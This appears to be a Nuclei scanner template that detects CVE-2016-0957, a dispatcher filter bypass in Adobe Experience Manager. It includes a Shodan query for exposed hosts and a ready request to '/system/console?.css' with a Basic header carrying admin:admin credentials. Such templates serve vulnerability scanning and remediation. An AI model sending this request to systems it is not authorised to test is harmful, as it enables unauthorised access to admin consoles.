id: CVE-2016-0957 info: name: Adobe AEM Dispatcher <4.15 - Rules Bypass author: geeknik severity: high description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. impact: | The vulnerability allows attackers to bypass security rules and potentially gain unauthorized access to sensitive information or perform malicious actions. remediation: | Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability. reference: - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html - https://nvd.nist.gov/vuln/detail/CVE-2016-0957 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-0957 epss-score: 0.03344 epss-percentile: 0.90339 cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adobe product: dispatcher shodan-query: http.component:"Adobe Experience Manager" tags: cve,cve2016,adobe,aem http: - method: GET path: - "{{BaseURL}}/system/console?.css" headers: Authorization: "Basic YWRtaW46YWRtaW4K" matchers-condition: and matchers: - type: word words: - "Adobe" - "java.lang" - "(Runtime)" condition: and - type: status status: - 200 # digest: 4a0a00473045022077556d3daf7be24aed5c059d57a9f9a8a7c56fc624bcd8843d49851236eeeb4802210082038feeeaca95b060232fae3f97608dc0d16a75de22429a02dcbe44556d11b5:922c64590222798bb761d5b6d8e72950